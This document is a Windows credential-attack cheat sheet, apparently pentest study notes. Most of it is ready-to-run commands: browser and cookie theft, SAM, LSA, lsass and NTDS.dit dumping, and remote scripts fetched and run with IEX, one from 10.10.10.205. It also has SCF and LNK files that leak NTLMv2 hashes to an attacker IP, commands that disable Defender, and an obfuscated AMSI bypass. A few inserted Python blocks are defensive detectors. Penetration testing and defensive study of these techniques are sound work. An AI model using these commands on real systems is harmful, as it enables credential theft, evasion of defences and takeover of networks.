Credentials Attacks On Windows

Here are some other places we should keep in mind when credential hunting:

  • PowerShell history files

  • Passwords in Group Policy in the SYSVOL share

  • Passwords in scripts in the SYSVOL share

  • Password in scripts on IT shares

  • Passwords in web.config files on dev machines and IT shares

  • unattend.xml

  • Passwords in the AD user or computer description fields

  • KeePass databases --> pull hash, crack and get loads of access.

  • Found on user systems and shares

  • Files such as pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, Sharepoint

Repositories:

Extract Credentials from browsers

PS C:\htb> start lazagne.exe all
PS C:\htb> .\SharpChrome.exe logins /unprotect

Extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials with SessionGopher

PS C:\htb> Import-Module .\SessionGopher.ps1
PS C:\Tools> Invoke-SessionGopher -Target WINLPE-SRV01

Sniff passwords and hashes with net-creds

Intrusionz3r0@htb[/htb]$ sudo python net-creds.py
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py -i eth0

Search credentials on the registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # PuTTY clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Passwords in unattend.xml

C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
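To audit an answer file before an image ships (or to understand what the paths above can leak), here is an added Python example, not code from the original page: it walks every element of an unattend.xml whose name ends in Password, honours the PlainText flag, and base64/UTF-16LE-decodes values that are not plain text, stripping the element-name suffix Windows appends before encoding. The sample XML is constructed inline.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample answer file (not a real capture); the AutoLogon value is
# built the way Windows stores it: base64 of UTF-16LE(password + "Password").
_ENCODED = base64.b64encode("S3cretAutoLogon!Password".encode("utf-16-le")).decode()
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>{_ENCODED}</Value><PlainText>false</PlainText></Password>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword><Value>Winter2024!</Value><PlainText>true</PlainText></AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>"""

def _local(tag):
    return tag.rsplit("}", 1)[-1]  # drop the {urn:schemas-microsoft-com:unattend} prefix

def decode_unattend_password(elem):
    """Clear-text value of a <...Password> element, or None if it carries no <Value>."""
    value, plaintext = None, False
    for child in elem:
        if _local(child.tag) == "Value":
            value = child.text or ""
        elif _local(child.tag) == "PlainText":
            plaintext = (child.text or "").strip().lower() == "true"
    if value is None or plaintext:
        return value
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return value    # not the documented encoding; hand the raw value to a human
    suffix = _local(elem.tag)  # "Password", "AdministratorPassword", ...
    return decoded[:-len(suffix)] if decoded.endswith(suffix) else decoded

def find_unattend_passwords(xml_text):
    """(element name, clear-text value) for every password element in an answer file."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag).endswith("Password"):
            secret = decode_unattend_password(elem)
            if secret is not None:
                findings.append((_local(elem.tag), secret))
    return findings
```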

Credentials on CMDKey

# Listing saved credentials
C:\htb> cmdkey /list

PowerShell History File

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

Powershell Transcript

C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt

Password in Alternate Data Stream

PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag

IIS Web config

Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Stealing cookies Firefox

# Path: %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
Intrusionz3r0@htb[/htb]$ python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d

Stealing cookies Chromium

# Path: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies
PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\htb> copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
PS C:\htb> Invoke-SharpChromium -Command "cookies slack.com"

Get Clipboard data

PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
PS C:\htb> Invoke-ClipboardLogger

Retrieve Putty Credentials from registry

PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<value>

Retrieve password from Wireless

C:\htb> netsh wlan show profile
C:\htb> netsh wlan show profile <ssid-name> key=clear

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

Search for file contents

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.*
dir | select-string "password"
PS C:\htb> Get-ChildItem -Path C:\PSTranscripts -Force -Recurse -Include *.txt, *.cfg, *.conf, *.xml, *.ini -Exclude "Windows","Documents*", "Program F*" -ErrorAction SilentlyContinue
PS C:\htb> Get-ChildItem -Path "C:\Users" -Recurse -File | Select-String -Pattern "password" | Select-Object FileName, LineNumber, Line

Search for filename

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
C:\htb> dir \confidentials.txt /s /p
PS C:\htb> Get-ChildItem -Path C:\ -Filter "confidentials.txt" -Recurse

Chrome Dictionary Files

PS C:\htb> Get-Content 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

Create a malicious lnk file to steal NTLMv2 hashes

Intrusionz3r0@htb[/htb]$ python3 lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

Sticky notes

# Path: C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Intrusionz3r0@htb[/htb]$ sqlite3 plum.sqlite "select Text from Note;"
Intrusionz3r0@htb[/htb]$ strings plum.sqlite-wal

PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process
PS C:\htb> cd .\PSSQLite\
PS C:\htb> Import-Module .\PSSQLite.psd1
PS C:\htb> $db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Recover credentials on PowerShell scripts

First Option:

PS C:\htb> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\htb> $credential.GetNetworkCredential().username
PS C:\htb> $credential.GetNetworkCredential().password
Str0ng3ncryptedP@ss!

Second Option

$user = "Administrator"
# DPAPI-protected SecureString blob as stored by ConvertFrom-SecureString; only decrypts on the same user/machine
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
$cred = New-Object System.Management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | Format-List

Monitoring for Process Command Lines

PS C:\htb> IEX (iwr 'http://10.10.10.205/procmon.ps1')

while($true)
{
  # Snapshot process command lines, wait a second, and print what changed
  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

Capture NTLMv2 through SCF files on windows

[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop
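A share-hygiene check for the SCF technique above, as an added Python example that is not part of the original page: it parses .scf files as the INI they are and flags any whose IconFile points at a UNC host outside an assumed allow-list, which is how a defender finds these files on shares before users browse them. The sample files are constructed inline.

```python
import configparser
import re

# Constructed sample .scf contents in the shape shown above (not real captures).
SAMPLE_SCF = {
    "legit.scf": "[Shell]\nCommand=2\nIconFile=\\\\10.10.14.3\\share\\legit.ico\n[Taskbar]\nCommand=ToggleDesktop\n",
    "desktop.scf": "[Shell]\nCommand=2\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,34\n[Taskbar]\nCommand=ToggleDesktop\n",
    "backup.scf": "[Shell]\nCommand=2\nIconFile=\\\\fileserver01\\icons\\app.ico\n[Taskbar]\nCommand=ToggleDesktop\n",
}

UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")  # \\host\share\... -> host

def scf_icon_host(scf_text):
    """UNC host an SCF's IconFile points at, or None for a local icon path."""
    # interpolation=None: otherwise %SystemRoot% is read as configparser syntax and raises
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(scf_text)
    icon = parser.get("Shell", "IconFile", fallback="")
    m = UNC_HOST.match(icon.strip())
    return m.group(1) if m else None

def flag_rogue_scf(files, trusted_hosts):
    """(file name, host) for every SCF whose icon would force an SMB auth to an untrusted host.
    trusted_hosts is an assumed allow-list of your own file servers."""
    trusted = {h.lower() for h in trusted_hosts}
    rogue = []
    for name, text in files.items():
        host = scf_icon_host(text)
        if host is not None and host.lower() not in trusted:
            rogue.append((name, host))
    return rogue
```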

Generate Malicious Lnk files

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Copying SAM SYSTEM and Security

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save

Dumping SAM and SYSTEM

Intrusionz3r0X@htb[/htb]$ impacket-reg domain/domuser:'Password'@192.168.210.16  save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.3\smbfolder'
Intrusionz3r0X@htb[/htb]$ impacket-secretsdump -sam sam.save -system system.save LOCAL 
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --sam

Dump LSA

Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --lsa

Dump lsass


# Finding the LSASS PID in cmd
C:\Windows\system32> tasklist /svc

# Finding the LSASS PID in PowerShell
PS C:\Windows\system32> Get-Process lsass
#----------------------------------------

# Create the lsass dump file (672 is the LSASS PID found above)
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

# Parse the lsass.dmp file offline.
Intrusionz3r0X@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp
C:\Windows\system32> .\mimikatz.exe privilege::debug "sekurlsa::logonpasswords full" exit

Dump lsass using RDP session

Dump NTDS.dit

To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights.


# List the local groups
C:\> net localgroup

# Check the user's group membership.
C:\> net user bwilliamson

# Create a shadow copy (NTDS.dit is locked while the DC is running)
C:\> vssadmin CREATE SHADOW /For=C:

# Copy the file out of the shadow copy.
C:\> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

# Extracting Credentials from NTDS.dit
PS C:\htb> Import-Module .\DSInternals.psd1
PS C:\htb> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

#Extracting Hashes Using SecretsDump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

# Fastest way to steal the NTDS.
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds
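On the detection side, the hive export, the comsvcs.dll MiniDump and the shadow-copy NTDS.dit copy in the sections above all leave distinctive process command lines. As an added Python example (not from the original page), this triage runs rules for those command lines over constructed Sysmon EID 1 / 4688-style events and pairs the shadow-copy creation and the NTDS copy on one host into a single alert, since either alone is routine on a backup schedule.

```python
import re

# Constructed process-creation events in a compact "host|user|commandline" shape
# (what Sysmon EID 1 / Security 4688 look like after field extraction; not real telemetry).
SAMPLE_EVENTS = [
    "WKS01|CORP\\alice|notepad.exe C:\\Users\\alice\\notes.txt",
    "WKS01|CORP\\alice|reg.exe save hklm\\sam C:\\sam.save",
    "DC01|CORP\\svc_backup|vssadmin CREATE SHADOW /For=C:",
    "DC01|CORP\\svc_backup|cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2"
    "\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit",
    "WKS02|CORP\\bob|rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full",
    "WKS02|CORP\\bob|reg.exe query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
]

# One rule per technique on this page; case-insensitive and tolerant of the optional ".exe".
RULES = [
    ("registry-hive-export", re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I)),
    ("lsass-minidump-comsvcs", re.compile(r"comsvcs\.dll\s*,\s*minidump\b", re.I)),
    ("shadow-copy-created", re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)),
    ("ntds-copied-from-shadow", re.compile(r"harddiskvolumeshadowcopy\d+\\windows\\ntds\\ntds\.dit", re.I)),
]

def triage_events(events):
    """(host, user, rule name) for every event whose command line matches a rule."""
    hits = []
    for line in events:
        host, user, cmdline = line.split("|", 2)
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((host, user, name))
    return hits

def ntds_theft_hosts(hits):
    """Hosts where a shadow copy was created AND NTDS.dit was copied out of one."""
    by_host = {}
    for host, _user, rule in hits:
        by_host.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in by_host.items()
                  if {"shadow-copy-created", "ntds-copied-from-shadow"} <= rules)
```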

Mimikatz

Run PowerShell as Administrator, add an exclusion path and disable Defender's real-time monitoring.

PS C:\Users\maldev > Start-Process PowerShell_ISE -Verb RunAs
PS C:\Users\maldev > Add-MpPreference -ExclusionPath "C:\Temp"
PS C:\Users\maldev > Set-MpPreference -DisableRealTimeMonitoring $true
PS C:\Users\maldev > Import-Module C:\Temp\Invoke-Mimikatz.ps1

AMSI Bypass

Find more: amsi.fail

PS C:\Users\maldev > S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

Disable LSA Protection with mimikatz

!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords

vault::cred #dump Credential Manager

lsadump::sam #dump the SAM

lsadump::cache #dump cached Domain credentials (these must be cracked, PTH doesn't work on mscache)
